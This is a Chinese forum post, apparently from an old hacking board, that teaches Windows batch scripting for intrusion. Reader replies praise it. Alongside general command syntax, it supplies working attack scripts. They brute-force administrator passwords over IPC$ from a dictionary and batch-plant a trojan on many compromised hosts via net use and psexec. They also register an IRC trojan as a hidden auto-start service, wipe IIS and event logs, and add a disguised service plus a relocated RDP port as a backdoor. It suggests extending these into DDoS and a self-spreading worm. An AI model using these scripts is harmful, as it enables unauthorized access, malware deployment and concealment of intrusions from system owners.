      3、if errorlevel / if not errorlevel 数字　 待执行的命令
      如果返回码等于指定的数字，则条件成立，运行命令，否则运行下一句。
      如if errorlevel 2 goto x2 　
      DOS程序运行时都会返回一个数字给DOS，称为错误码errorlevel或称返回码，常见的返回码为0、1。
      10.for 命令
      for 命令是一个比较复杂的命令，主要用于参数在指定的范围内循环执行命令。
      在批处理文件中使用 FOR 命令时，指定变量请使用 %%variable
      for {%variable|%%variable} in (set) do command [ CommandLineOptions]
      %variable 指定一个单一字母可替换的参数。
      (set) 指定一个或一组文件。可以使用通配符。
      command 指定对每个文件执行的命令。
      command-parameters 为特定命令指定参数或命令行开关。
      在批处理文件中使用 FOR 命令时，指定变量请使用 %%variable
      而不要用 %variable。变量名称是区分大小写的，所以 %i 不同于 %I
      如果命令扩展名被启用，下列额外的 FOR 命令格式会受到
      支持:
      FOR /D %variable IN (set) DO command [command-parameters]
      如果集中包含通配符，则指定与目录名匹配，而不与文件
      名匹配。
      FOR /R [[drive:]path] %variable IN (set) DO command [command-
      检查以 [drive:]path 为根的目录树，指向每个目录中的
      FOR 语句。如果在 /R 后没有指定目录，则使用当前
      目录。如果集仅为一个单点(.)字符，则枚举该目录树。
      FOR /L %variable IN (start,step,end) DO command [command-para
      该集表示以增量形式从开始到结束的一个数字序列。
      因此，(1,1,5) 将产生序列 1 2 3 4 5，(5,-1,1) 将产生
      序列 (5 4 3 2 1)。
      FOR /F ["options"] %variable IN (file-set) DO command
      FOR /F ["options"] %variable IN ("string") DO command
      FOR /F ["options"] %variable IN (';command';) DO command
      或者，如果有 usebackq 选项:
      FOR /F ["options"] %variable IN (file-set) DO command
      FOR /F ["options"] %variable IN ("string") DO command
      FOR /F ["options"] %variable IN (';command';) DO command
      filenameset 为一个或多个文件名。继续到 filenameset 中的
      下一个文件之前，每份文件都已被打开、读取并经过处理。
      处理包括读取文件，将其分成一行行的文字，然后将每行
      解析成零或更多的符号。然后用已找到的符号字符串变量值
      调用 For 循环。以默认方式，/F 通过每个文件的每一行中分开
      的第一个空白符号。跳过空白行。您可通过指定可选 "options"
      参数替代默认解析操作。这个带引号的字符串包括一个或多个
      指定不同解析选项的关键字。这些关键字为:
      eol=c - 指一个行注释字符的结尾(就一个)
      skip=n - 指在文件开始时忽略的行数。
      delims=xxx - 指分隔符集。这个替换了空格和跳格键的
      默认分隔符集。
      tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代
      的 for 本身。这会导致额外变量名称的
      格式为一个范围。通过 nth 符号指定 m
      符号字符串中的最后一个字符星号，
      那么额外的变量将在最后一个符号解析之
      分配并接受行的保留文本。
      usebackq - 指定新语法已在下类情况中使用:
      在作为命令执行一个后引号的字符串并且
      引号字符为文字字符串命令并允许在 fi
      中使用双引号扩起文件名称。
      sample1:
      FOR /F "eol=;;; tokens=2,3* delims=, " %i in (myfile.txt) do command
      会分析 myfile.txt 中的每一行，忽略以分号打头的那些行，将
      每行中的第二个和第三个符号传递给 for 程序体；用逗号和/或
      空格定界符号。请注意，这个 for 程序体的语句引用 %i 来
      取得第二个符号，引用 %j 来取得第三个符号，引用 %k
      来取得第三个符号后的所有剩余符号。对于带有空格的文件
      名，您需要用双引号将文件名括起来。为了用这种方式来使
      用双引号，您还需要使用 usebackq 选项，否则，双引号会
      被理解成是用作定义某个要分析的字符串的。
      %i 专门在 for 语句中得到说明，%j 和 %k 是通过
      tokens= 选项专门得到说明的。您可以通过 tokens= 一行
      指定最多 26 个符号，只要不试图说明一个高于字母 ';z'; 或
      ';Z'; 的变量。请记住，FOR 变量是单一字母、分大小写和全局的；
      同时不能有 52 个以上都在使用中。
      您还可以在相邻字符串上使用 FOR /F 分析逻辑；方法是，
      用单引号将括号之间的 filenameset 括起来。这样，该字符
      串会被当作一个文件中的一个单一输入行。
      最后，您可以用 FOR /F 命令来分析命令的输出。方法是，将
      括号之间的 filenameset 变成一个反括字符串。该字符串会
      被当作命令行，传递到一个子 CMD.EXE，其输出会被抓进
      内存，并被当作文件分析。因此，以下例子:
      FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i
      会枚举当前环境中的环境变量名称。
      另外，FOR 变量参照的替换已被增强。您现在可以使用下列
      选项语法:
      ~I - 删除任何引号(")，扩充 %I
      %~fI - 将 %I 扩充到一个完全合格的路径名
      %~dI - 仅将 %I 扩充到一个驱动器号
      %~pI - 仅将 %I 扩充到一个路径
      %~nI - 仅将 %I 扩充到一个文件名
      %~xI - 仅将 %I 扩充到一个文件扩展名
      %~sI - 扩充的路径只含有短名
      %~aI - 将 %I 扩充到文件的文件属性
      %~tI - 将 %I 扩充到文件的日期/时间
      %~zI - 将 %I 扩充到文件的大小
      %~&#36;PATH:I - 查找列在路径环境变量的目录，并将 %I 扩充
      到找到的第一个完全合格的名称。如果环境变量
      未被定义，或者没有找到文件，此组合键会扩充
      空字符串
      可以组合修饰符来得到多重结果:
      %~dpI - 仅将 %I 扩充到一个驱动器号和路径
      %~nxI - 仅将 %I 扩充到一个文件名和扩展名
      %~fsI - 仅将 %I 扩充到一个带有短名的完整路径名
      %~dp&#36;PATH:i - 查找列在路径环境变量的目录，并将 %I 扩充
      到找到的第一个驱动器号和路径。
      %~ftzaI - 将 %I 扩充到类似输出线路的 DIR
      在以上例子中，%I 和 PATH 可用其他有效数值代替。%~ 语法
      用一个有效的 FOR 变量名终止。选取类似 %I 的大写变量名
      比较易读，而且避免与不分大小写的组合键混淆。
      以上是MS的官方帮助，下面我们举几个例子来具体说明一下For命令在入侵中的用途。
      sample2：
      利用For命令来实现对一台目标Win2k主机的暴力密码破解。
      我们用net use \\ip\ipc&#36; "password" /u:"administrator"来尝试这和目标主机进行连接，当成功时记下密码。
      最主要的命令是一条：for /f i% in (dict.txt) do net use \\ip\ipc&#36; "i%"
      /u:"administrator"
      用i%来表示admin的密码，在dict.txt中这个取i%的值用net use 命令来连接。然后将程序运行结果传递给find命令－－
      for /f i%% in (dict.txt) do net use \\ip\ipc&#36; "i%%"
      /u:"administrator"|find ":命令成功完成">>D:\ok.txt ，这样就ko了。
      sample3：
      你有没有过手里有大量肉鸡等着你去种后门＋木马呢？，当数量特别多的时候，原本很开心的一件事都会变得很郁闷：）。文章开头就谈到使用批处理文件，可以简化日常或重复性任务。那么如何实现呢？呵呵，看下去你就会明白了。

      主要命令也只有一条：（在批处理文件中使用 FOR 命令时，指定变量使用 %%variable）
      @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat
      %%i %%j %%k
      tokens的用法请参见上面的sample1，在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i %j %k。
      而cultivate.bat无非就是用net use命令来建立IPC&#36;连接，并copy木马＋后门到victim，然后用返回码（If
      errorlever =）来筛选成功种植后门的主机，并echo出来，或者echo到指定的文件。
      delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i
      %%j %%k表示的对象来排列，一般就是 ip password username。
      代码雏形：
      --------------- cut here then save as a batchfile(I call it main.bat )
      ---------------------------
      @echo off
      @if "%1"=="" goto usage
      @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call
      IPChack.bat %%i %%j %%k
      @goto end
      :usage
      @echo run this batch in dos modle.or just double-click it.
      :end
      --------------- cut here then save as a batchfile(I call it main.bat )
      ---------------------------

      ------------------- cut here then save as a batchfile(I call it door.bat)
      -----------------------------
      @net use \\%1\ipc&#36; %3 /u:"%2"
      @if errorlevel 1 goto failed
      @echo Trying to establish the IPC&#36; connection …………OK
      @copy windrv32.exe\\%1\admin&#36;\system32 && if not errorlevel 1 echo IP %1
      USER %2 PWD %3 >>ko.txt
      @psexec \\%1 c:\winnt\system32\windrv32.exe
      @psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored
      >>ko.txt
      :failed
      @echo Sorry can not connected to the victim.
      ----------------- cut here then save as a batchfile(I call it door.bat)
      --------------------------------
      这只是一个自动种植后门批处理的雏形，两个批处理和后门程序（Windrv32.exe）,PSexec.exe需放在统一目录下.批处理内容
      尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究.

      二.如何在批处理文件中使用参数
      批处理中可以使用参数，一般从1%到 9%这九个，当有多个参数时需要用shift来移动，这种情况并不多见，我们就不考虑它了。
      sample1：fomat.bat
      @echo off
      if "%1"=="a" format a:
      :format
      @format a:/q/u/auotset
      @echo please insert another disk to driver A.
      @pause
      @goto fomat
      这个例子用于连续地格式化几张软盘，所以用的时候需在dos窗口输入fomat.bat a，呵呵,好像有点画蛇添足了～^_^
      sample2：
      当我们要建立一个IPC&#36;连接地时候总要输入一大串命令，弄不好就打错了，所以我们不如把一些固定命令写入一个批处理，把肉鸡地ip password
      username 当着参数来赋给这个批处理，这样就不用每次都打命令了。
      @echo off
      @net use \\1%\ipc&#36; "2%" /u:"3%" 注意哦，这里PASSWORD是第二个参数。
      @if errorlevel 1 echo connection failed
      怎么样,使用参数还是比较简单的吧？你这么帅一定学会了^_^.No.3
      三.如何使用组合命令(Compound Command)
      1.&
      Usage：第一条命令 & 第二条命令 [& 第三条命令...]
      用这种方法可以同时执行多条命令，而不管命令是否执行成功
      Sample：
      C:\>dir z: & dir c:\Ex4rch
      The system cannot find the path specified.
      Volume in drive C has no label.
      Volume Serial Number is 0078-59FB
      Directory of c:\Ex4rch
      2002-05-14 23:51 <DIR> .
      2002-05-14 23:51 <DIR> ..
      2002-05-14 23:51 14 sometips.gif
      2.&&
      Usage：第一条命令 && 第二条命令 [&& 第三条命令...]
      用这种方法可以同时执行多条命令，当碰到执行出错的命令后将不执行后面的命令，如果一直没有出错则一直执行完所有命令；
      Sample：
      C:\>dir z: && dir c:\Ex4rch
      The system cannot find the path specified.
      C:\>dir c:\Ex4rch && dir z:
      Volume in drive C has no label.
      Volume Serial Number is 0078-59FB
      Directory of c:\Ex4rch
      2002-05-14 23:55 <DIR> .
      2002-05-14 23:55 <DIR> ..
      2002-05-14 23:55 14 sometips.gif
      1 File(s) 14 bytes
      2 Dir(s) 768,671,744 bytes free
      The system cannot find the path specified.
      在做备份的时候可能会用到这种命令会比较简单，如：
      dir file://192.168.0.1/database/backup.mdb && copy
      file://192.168.0.1/database/backup.mdb E:\backup
      如果远程服务器上存在backup.mdb文件，就执行copy命令，若不存在该文件则不执行copy命令。这种用法可以替换IF exist了 ：）
      3.||
      Usage：第一条命令 || 第二条命令 [|| 第三条命令...]
      用这种方法可以同时执行多条命令，当碰到执行正确的命令后将不执行后面的命令，如果没有出现正确的命令则一直执行完所有命令；
      Sample：
      C:\Ex4rch>dir sometips.gif || del sometips.gif
      Volume in drive C has no label.
      Volume Serial Number is 0078-59FB
      Directory of C:\Ex4rch
      2002-05-14 23:55 14 sometips.gif
      1 File(s) 14 bytes
      0 Dir(s) 768,696,320 bytes free
      组合命令使用的例子：
      sample：
      @copy trojan.exe \\%1\admin&#36;\system32 && if not errorlevel 1 echo IP %1
      USER %2 PASS %3 >>victim.txt
      四、管道命令的使用
      1.| 命令
      Usage：第一条命令 | 第二条命令 [| 第三条命令...]
      将第一条命令的结果作为第二条命令的参数来使用，记得在unix中这种方式很常见。
      sample：
      time /t>>D:\IP.log
      netstat -n -p tcp|find ":3389">>D:\IP.log
      start Explorer
      看出来了么？用于终端服务允许我们为用户自定义起始的程序，来实现让用户运行下面这个bat，以获得登录用户的IP。
      2.>、>>输出重定向命令
      将一条命令或某个程序输出结果的重定向到特定文件中, > 与
      >>的区别在于，>会清除调原有文件中的内容后写入指定文件，而>>只会追加内容到指定文件中，而不会改动其中的内容。
      sample1：
      echo hello world>c:\hello.txt (stupid example?)
      sample2:
      时下DLL木马盛行，我们知道system32是个捉迷藏的好地方，许多木马都削尖了脑袋往那里钻，DLL马也不例外，针对这一点我们可以在安装好系统和必要的应用程序后，对该目录下的EXE和DLL文件作一个记录：

      运行CMD--转换目录到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt,
      这样所有的EXE和DLL文件的名称都被分别记录到exeback.txt和dllback.txt中,
      日后如发现异常但用传统的方法查不出问题时,则要考虑是不是系统中已经潜入DLL木马了.
      这时我们用同样的命令将system32下的EXE和DLL文件记录到另外的exeback1.txt和dllback1.txt中,然后运行:
      CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt
      dllback1.txt>diff.txt.(用FC命令比较前后两次的DLL和EXE文件,并将结果输入到diff.txt中),这样我们就能发现一些多出来的DLL和EXE文件,然后通过查看创建时间、版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。没有是最好，如果有的话也不要直接DEL掉，先用regsvr32
      /u trojan.dll将后门DLL文件注销掉,再把它移到回收站里，若系统没有异常反映再将之彻底删除或者提交给杀毒软件公司。
      3.< 、>& 、<&
      < 从文件中而不是从键盘中读入命令输入。
      >& 将一个句柄的输出写入到另一个句柄的输入中。
      <& 从一个句柄读取输入并将其写入到另一个句柄输出中。
      这些并不常用，也就不多做介绍。
      No.5
      五.如何用批处理文件来操作注册表
      在入侵过程中经常回操作注册表的特定的键值来实现一定的目的，例如:为了达到隐藏后门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会修改注册表来加固系统或者改变系统的某个属性，这些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来生成一个REG文件)

      关于注册表的操作，常见的是创建、修改、删除。
      1.创建
      创建分为两种，一种是创建子项(Subkey)
      我们创建一个文件，内容如下：
      Windows Registry Editor Version 5.00
      [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]
      然后执行该脚本，你就已经在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下创建了一个名字为“hacker”的子项。
      另一种是创建一个项目名称
      那这种文件格式就是典型的文件格式，和你从注册表中导出的文件格式一致，内容如下：
      Windows Registry Editor Version 5.00
      [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
      "Invader"="Ex4rch"
      "Door"=C:\\WINNT\\system32\\door.exe
      "Autodos"=dword:02
      这样就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下
      新建了:Invader、door、about这三个项目
      Invader的类型是“String Value”
      door的类型是“REG SZ Value”
      Autodos的类型是“DWORD Value”

      2.修改
      修改相对来说比较简单，只要把你需要修改的项目导出，然后用记事本进行修改，然后导入（regedit /s）即可。
      3.删除
      我们首先来说说删除一个项目名称，我们创建一个如下的文件：
      Windows Registry Editor Version 5.00
      [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
      "Ex4rch"=-
      执行该脚本，[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就被删除了；

      我们再看看删除一个子项，我们创建一个如下的脚本：
      Windows Registry Editor Version 5.00
      [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
      执行该脚本，[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已经被删除了。

      相信看到这里，.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定内容的.reg文件了，记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。

      samlpe1:如上面的那个例子,如想生成如下注册表文件
      Windows Registry Editor Version 5.00
      [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
      "Invader"="Ex4rch"
      "door"=hex:255
      "Autodos"=dword:000000128
      只需要这样：
      @echo Windows Registry Editor Version 5.00>>Sample.reg
      @echo
      [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>Sample.reg

      @echo "Invader"="Ex4rch">>Sample.reg
      @echo "door"=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg
      @echo "Autodos"=dword:02>>Sample.reg

      samlpe2:
       我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为windrv32.exe)

      @start windrv32.exe
      @attrib +h +r windrv32.exe
      @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
      >>patch.dll
      @echo "windsnx "=- >>patch.dll
      @sc.exe create Windriversrv type= kernel start= auto displayname=
      WindowsDriver binpath= c:\winnt\system32\windrv32.exe
      @regedit /s patch.dll
      @delete patch.dll
      @REM [删除DSNXDE在注册表中的启动项，用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读，并config为自启动]
      @REM 这样不是更安全^_^.
      六.精彩实例放送。
      1.删除win2k/xp系统默认共享的批处理
      ------------------------ cut here then save as .bat or .cmd file
      ---------------------------
      @echo preparing to delete all the default shares.when ready pres any key.
      @pause
      @echo off
      :Rem check parameters if null show usage.
      if {%1}=={} goto :Usage
      :Rem code start.
      echo.
      echo ------------------------------------------------------
      echo.
      echo Now deleting all the default shares.
      echo.
      net share %1&#36; /delete
      net share %2&#36; /delete
      net share %3&#36; /delete
      net share %4&#36; /delete
      net share %5&#36; /delete
      net share %6&#36; /delete
      net share %7&#36; /delete
      net share %8&#36; /delete
      net share %9&#36; /delete
      net stop Server
      net start Server
      echo.
      echo All the shares have been deleteed
      echo.
      echo ------------------------------------------------------
      echo.
      echo Now modify the registry to change the system default properties.
      echo.
      echo Now creating the registry file
      echo Windows Registry Editor Version 5.00> c:\delshare.reg
      echo
      [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>>
      c:\delshare.reg
      echo "AutoShareWks"=dword:00000000>> c:\delshare.reg
      echo "AutoShareServer"=dword:00000000>> c:\delshare.reg
      echo Nowing using the registry file to chang the system default
      properties.
      regedit /s c:\delshare.reg
      echo Deleting the temprotarily files.
      del c:\delshare.reg
      goto :END
      :Usage
      echo.
      echo ------------------------------------------------------
      echo.
      echo ☆ A example for batch file ☆
      echo ☆ [Use batch file to change the sysytem share properties.] ☆
      echo.
      echo Author：Ex4rch
      echo Mail:Ex4rch@hotmail.com QQ:1672602
      echo.
      echo Error：Not enough parameters
      echo.
      echo ☆ Please enter the share disk you wanna delete ☆
      echo.
      echo For instance，to delete the default shares:
      echo delshare c d e ipc admin print
      echo.
      echo If the disklable is not as C: D: E: ，Please chang it youself.
      echo.
      echo example：
      echo If locak disklable are C: D: E: X: Y: Z: ，you should chang the
      command into ：
      echo delshare c d e x y z ipc admin print
      echo.
      echo *** you can delete nine shares once in a useing ***
      echo.
      echo ------------------------------------------------------
      goto :EOF
      :END
      echo.
      echo ------------------------------------------------------
      echo.
      echo OK,delshare.bat has deleted all the share you assigned.
      echo.Any questions ,feel free to mail to Ex4rch@hotmail.com.
      echo
      echo.
      echo ------------------------------------------------------
      echo.
      :EOF
      echo end of the batch file
      ------------------------ cut here then save as .bat or .cmd file
      ---------------------------

      2.全面加固系统（给肉鸡打补丁）的批处理文件
      ------------------------ cut here then save as .bat or .cmd file
      ---------------------------
      @echo Windows Registry Editor Version 5.00 >patch.dll
      @echo
      [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
      >>patch.dll
      @echo "AutoShareServer"=dword:00000000 >>patch.dll
      @echo "AutoShareWks"=dword:00000000 >>patch.dll
      @REM [禁止共享]
      @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
      >>patch.dll
      @echo "restrictanonymous"=dword:00000001 >>patch.dll
      @REM [禁止匿名登录]
      @echo
      [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]
      >>patch.dll
      @echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll
      @REM [禁止及文件访问和打印共享]
      @echo
      [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\@REMoteRegistry]
      >>patch.dll
      @echo "Start"=dword:00000004 >>patch.dll
      @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule]
      >>patch.dll
      @echo "Start"=dword:00000004 >>patch.dll
      @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
      NT\CurrentVersion\Winlogon] >>patch.dll
      @echo "ShutdownWithoutLogon"="0" >>patch.dll
      @REM [禁止登录前关机]
      @echo "DontDisplayLastUserName"="1" >>patch.dll
      @REM [禁止显示前一个登录用户名称]
      @regedit /s patch.dll
      ------------------------ cut here then save as .bat or .cmd file
      ---------------------------
      下面命令是清除肉鸡所有日志，禁止一些危险的服务，并修改肉鸡的terminnal service留跳后路。
      @regedit /s patch.dll
      @net stop w3svc
      @net stop event log
      @del c:\winnt\system32\logfiles\w3svc1\*.* /f /q
      @del c:\winnt\system32\logfiles\w3svc2\*.* /f /q
      @del c:\winnt\system32\config\*.event /f /q
      @del c:\winnt\system32dtclog\*.* /f /q
      @del c:\winnt\*.txt /f /q
      @del c:\winnt\*.log /f /q
      @net start w3svc
      @net start event log
      @rem [删除日志]

      @net stop lanmanserver /y
      @net stop Schedule /y
      @net stop RemoteRegistry /y
      @del patch.dll
      @echo The server has been patched,Have fun.
      @del patch.bat
      @REM [禁止一些危险的服务。]
      @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
      Server\WinStations\RDP-Tcp] >>patch.dll
      @echo "PortNumber"=dword:00002010 >>patch.dll
      @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
      Server\Wds\rdpwd\Tds\tcp >>patch.dll
      @echo "PortNumber"=dword:00002012 >>patch.dll
      @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
      >>patch.dll
      @echo "Start"=dword:00000002 >>patch.dll
      @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]
      >>patch.dll
      @echo "Start"=dword:00000002 >>patch.dll
      @echo "ErrorControl"=dword:00000001 >>patch.dll
      @echo
      "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
      >>patch.dll
      @echo
      74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
      >>patch.dll
      @echo
      00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
      >>patch.dll
      @echo "ObjectName"="LocalSystem" >>patch.dll
      @echo "Type"=dword:00000010 >>patch.dll
      @echo "Description"="Keep record of the program and windows'; message。"
      >>patch.dll
      @echo "DisplayName"="Microsoft EventLog" >>patch.dll
      @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice]
      >>patch.dll
      @echo "Start"=dword:00000004 >>patch.dll
      @copy c:\winnt\system32\termsrv.exe c:\winnt\system32\eventlog.exe
      @REM [修改3389连接，端口为8210(十六进制为00002012)，名称为Microsoft EventLog，留条后路]

yudao911

好东西，
我顶一下
有空去试试

need

狂顶中。。。。。。。

☆花满庭☆

版主真强。。能找到这许好东西。。。

ljwfw1982

    佩服！佩服！看来版主的确功力深厚，但小弟现在的水平只是菜鸟，看了您的武功密集后，自我感觉像是看了无字天书，一个字“晕”！！！
如果版主真的有心成全小弟，不知高人是否会将Windows 98启动软盘的AUTOEXEC.BAT批处理文件修改后，使其成为有选项设置的Ghost系统恢复软盘，本小弟的Win98.gho文件在E盘上，用原始的方法进入Ghost恢复系统太“逊”！

leon

楼主能不能把for、if的参数写详细点

asdcn81

我也试试,支持,以后多多的发!

luodan9109

支持楼主,以后多多的发!